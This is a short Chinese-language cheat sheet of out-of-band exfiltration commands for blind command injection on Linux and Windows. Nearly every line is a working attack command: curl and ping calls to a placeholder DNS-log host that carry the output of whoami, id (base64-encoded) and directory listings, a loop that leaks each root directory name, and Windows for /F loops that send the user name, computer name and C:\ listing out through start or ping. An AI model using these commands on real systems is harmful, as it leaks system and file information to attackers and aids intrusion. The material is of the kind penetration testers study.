linux:
curl http://xxx.dnslog.link/`whoami` ping -c 1 `whoami`.xxx.dnslog.link 如果碰到内容有空格(换行符等),就会截断,只输出前面的,这时候可以利用编码来输出,但有输出字符数最大限制; curl http://xxx.dnslog.link/$(id|base64) 碰到ls这类多个输出的命令,直接使用脚本; for i in $(ls /);do curl "http://$i.xxx.dnslog.link/";done;
windows:
利用HTTP请求:
for /F %x in ('whoami') do start http://xxx.dnslog.link/%x
将结果使用默认浏览器弹出;
利用DNS请求:
获取计算机名:for /F "delims=\" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link
获取用户名:for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.dnslog.link
不能编码输出,但利用powershell可以实现;
dir有/b参数,不显示修改日期等信息,只显示文件名,所以可以弹出;
for /F %x in ('dir /b C:\') do start http://xxx.dnslog.link/[%x].jpg
